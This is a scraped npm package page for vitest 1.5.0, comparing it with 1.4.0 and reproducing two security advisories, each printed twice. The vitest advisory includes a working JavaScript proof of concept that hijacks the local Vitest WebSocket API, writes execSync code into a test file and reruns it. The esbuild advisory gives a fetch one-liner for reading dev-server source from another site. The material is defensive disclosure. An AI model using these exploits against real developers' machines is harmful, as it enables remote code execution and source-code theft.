Version Details and Security Vulnerabilities

📦

vitest

1.5.0

Comparision Betweeen 1.5.0 and 1.4.0

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

Unpacked Size

1.35 MB

Version 1.5.0 Details

Vitest 1.5.0 brings several updates compared to its predecessor, version 1.4.0. In the core dependencies, vite-node jumps from 1.4.0 to 1.5.0, indicating potential enhancements and bug fixes within the Vite Node runtime used by Vitest. Similarly, @vitest/spy, @vitest/utils, @vitest/expect, @vitest/runner, and @vitest/snapshot all increment from 1.4.0 to 1.5.0, suggesting improvements across Vitest's spying, utility, assertion, test running, and snapshotting functionalities. tinypool sees a minor update from 0.8.2 to 0.8.3, likely involving small fixes or improvements to the thread pool management.

In the devDependencies, a significant update is happy-dom, moving from version 13.3.8 to 14.3.10, a signal of notable enhancements in the Happy DOM environment used for browser-like testing without a full browser. The file count in the distribution increased slightly from 88 to 89 files and the unpacked size grew from 1412553 to 1418776, potentially reflecting some additions of new functionalities.

For developers, these upgrades translate to a more refined testing experience. Upgrading to Vitest 1.5.0 means benefiting from the latest improvements in Vite Node, enhanced spying capabilities, more robust utilities, refined assertions, a newer test runner, and improved snapshotting. the new happy-dom can offer a better emulated DOM for front-end component testing, and potentially fix some bugs that were present in the previous version. The changes collectively contribute to a more reliable and feature-rich testing environment. These improvements ensure a smoother development workflow with potentially enhanced performance and more extensive support for modern web development practices.

Security Vulnerabilities

This site is an independent open-source project and is not affiliated with, endorsed by, or sponsored by npm, Inc. or GitHub, Inc. The name “npm” is a registered trademark of npm, Inc., used here solely to describe compatibility and reference publicly available npm package data.

Version Details and Security Vulnerabilities

📦

vitest

1.5.0

Comparision Betweeen 1.5.0 and 1.4.0

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

Unpacked Size

1.35 MB

Version 1.5.0 Details

Security Vulnerabilities

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 1.5.0 of the package vitest.

All Security Vulnerabilities

All the vulnerabilities related to the version 1.5.0 of the package

Summary:

Vitest allows Remote Code Execution when accessing a malicious website while Vitest API server is listening

Details:

Summary

Arbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.

Details

When api option is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks. https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46

This WebSocket server has saveTestFile API that can edit a test file and rerun API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the saveTestFile API and then running that file by calling the rerun API. https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76

PoC

Open Vitest UI.
Access a malicious web site with the script below.
If you have calc executable in PATH env var (you'll likely have it if you are running on Windows), that application will be executed.

// code from https://github.com/WebReflection/flatted
const Flatted=function(n){"use strict";function t(n){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f="string",i={},c="object",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p<y;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i&&(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g<m;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c&&u?y(o,new Set,u,f):u;return f.call({"":i},"",i)},S=function(n,r,o){for(var u=r&&t(r)===c?function(n,t){return""===n||-1<r.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({"":n},"",n)),v=!y;y<l.length;)v=!0,s[y]=e(l[y++],S,o);return"["+s.join(",")+"]";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});

// actual code to run
const ws = new WebSocket('ws://localhost:51204/__vitest_api__')
ws.addEventListener('message', e => {
    console.log(e.data)
})
ws.addEventListener('open', () => {
    ws.send(Flatted.stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))

    const testFilePath = "/path/to/test-file/basic.test.ts" // use a test file returned from the response of "getFiles"

    // edit file content to inject command execution
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "saveTestFile",
      a: [testFilePath, "import child_process from 'child_process';child_process.execSync('calc')"]
    }))
    // rerun the tests to run the injected command execution code
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "rerun",
      a: [testFilePath]
    }))
})

Impact

This vulnerability can result in remote code execution for users that are using Vitest serve API.

Details about vitest@1.5.0

Summary:

esbuild enables any website to send any requests to the development server and read the response

Details:

Summary

esbuild allows any websites to send any request to the development server and read the response due to default CORS settings.

Details

esbuild sets Access-Control-Allow-Origin: * header to all requests, including the SSE connection, which allows any websites to send any request to the development server and read the response.

https://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L121 https://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L363

Attack scenario:

The attacker serves a malicious web page (http://malicious.example.com).
The user accesses the malicious web page.
The attacker sends a fetch('http://127.0.0.1:8000/main.js') request by JS in that malicious web page. This request is normally blocked by same-origin policy, but that's not the case for the reasons above.
The attacker gets the content of http://127.0.0.1:8000/main.js.

In this scenario, I assumed that the attacker knows the URL of the bundle output file name. But the attacker can also get that information by

Fetching /index.html: normally you have a script tag here
Fetching /assets: it's common to have a assets directory when you have JS files and CSS files in a different directory and the directory listing feature tells the attacker the list of files
Connecting /esbuild SSE endpoint: the SSE endpoint sends the URL path of the changed files when the file is changed (new EventSource('/esbuild').addEventListener('change', e => console.log(e.type, e.data)))
Fetching URLs in the known file: once the attacker knows one file, the attacker can know the URLs imported from that file

The scenario above fetches the compiled content, but if the victim has the source map option enabled, the attacker can also get the non-compiled content by fetching the source map file.

PoC

Download reproduction.zip
Extract it and move to that directory
Run npm i
Run npm run watch
Run fetch('http://127.0.0.1:8000/app.js').then(r => r.text()).then(content => console.log(content)) in a different website's dev tools.

Impact

Users using the serve feature may get the source code stolen by malicious websites.

Details about esbuild@0.21.5

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 1.5.0 of the package vitest.

All Security Vulnerabilities

All the vulnerabilities related to the version 1.5.0 of the package

Summary:

Vitest allows Remote Code Execution when accessing a malicious website while Vitest API server is listening

Details:

Summary

Arbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.

Details

PoC

Open Vitest UI.
Access a malicious web site with the script below.
If you have calc executable in PATH env var (you'll likely have it if you are running on Windows), that application will be executed.

// code from https://github.com/WebReflection/flatted
const Flatted=function(n){"use strict";function t(n){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f="string",i={},c="object",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p<y;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i&&(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g<m;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c&&u?y(o,new Set,u,f):u;return f.call({"":i},"",i)},S=function(n,r,o){for(var u=r&&t(r)===c?function(n,t){return""===n||-1<r.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({"":n},"",n)),v=!y;y<l.length;)v=!0,s[y]=e(l[y++],S,o);return"["+s.join(",")+"]";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});

// actual code to run
const ws = new WebSocket('ws://localhost:51204/__vitest_api__')
ws.addEventListener('message', e => {
    console.log(e.data)
})
ws.addEventListener('open', () => {
    ws.send(Flatted.stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))

    const testFilePath = "/path/to/test-file/basic.test.ts" // use a test file returned from the response of "getFiles"

    // edit file content to inject command execution
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "saveTestFile",
      a: [testFilePath, "import child_process from 'child_process';child_process.execSync('calc')"]
    }))
    // rerun the tests to run the injected command execution code
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "rerun",
      a: [testFilePath]
    }))
})

Impact

This vulnerability can result in remote code execution for users that are using Vitest serve API.

Details about vitest@1.5.0

Summary:

esbuild enables any website to send any requests to the development server and read the response

Details:

Summary

esbuild allows any websites to send any request to the development server and read the response due to default CORS settings.

Details

esbuild sets Access-Control-Allow-Origin: * header to all requests, including the SSE connection, which allows any websites to send any request to the development server and read the response.

Attack scenario:

The attacker serves a malicious web page (http://malicious.example.com).
The user accesses the malicious web page.
The attacker sends a fetch('http://127.0.0.1:8000/main.js') request by JS in that malicious web page. This request is normally blocked by same-origin policy, but that's not the case for the reasons above.
The attacker gets the content of http://127.0.0.1:8000/main.js.

In this scenario, I assumed that the attacker knows the URL of the bundle output file name. But the attacker can also get that information by

Fetching /index.html: normally you have a script tag here
Fetching /assets: it's common to have a assets directory when you have JS files and CSS files in a different directory and the directory listing feature tells the attacker the list of files
Connecting /esbuild SSE endpoint: the SSE endpoint sends the URL path of the changed files when the file is changed (new EventSource('/esbuild').addEventListener('change', e => console.log(e.type, e.data)))
Fetching URLs in the known file: once the attacker knows one file, the attacker can know the URLs imported from that file

The scenario above fetches the compiled content, but if the victim has the source map option enabled, the attacker can also get the non-compiled content by fetching the source map file.

PoC

Download reproduction.zip
Extract it and move to that directory
Run npm i
Run npm run watch
Run fetch('http://127.0.0.1:8000/app.js').then(r => r.text()).then(content => console.log(content)) in a different website's dev tools.

Impact

Users using the serve feature may get the source code stolen by malicious websites.

Details about esbuild@0.21.5

Version Details and Security Vulnerabilities

vitest

Comparision Betweeen 1.5.0 and 1.4.0

Version 1.5.0 Details

Security Vulnerabilities

Version Details and Security Vulnerabilities

vitest

Comparision Betweeen 1.5.0 and 1.4.0

Version 1.5.0 Details

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

Summary

Details

PoC

Impact

Summary

Details

PoC

Impact

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

Summary

Details

PoC

Impact

Summary

Details

PoC

Impact

Version Details and Security Vulnerabilities

vitest

Comparision Betweeen 1.5.0 and 1.4.0

Version 1.5.0 Details

Security Vulnerabilities

Version Details and Security Vulnerabilities

vitest

Comparision Betweeen 1.5.0 and 1.4.0

Version 1.5.0 Details

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

vitest@1.5.0 GHSA-9crc-q9x8-hgqq 9.6

Summary

Details

PoC

Impact

esbuild@0.21.5 GHSA-67mh-4wv8-2f99 5.3

Summary

Details

PoC

Impact

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

vitest@1.5.0 GHSA-9crc-q9x8-hgqq 9.6

Summary

Details

PoC

Impact

esbuild@0.21.5 GHSA-67mh-4wv8-2f99 5.3

Summary

Details

PoC

Impact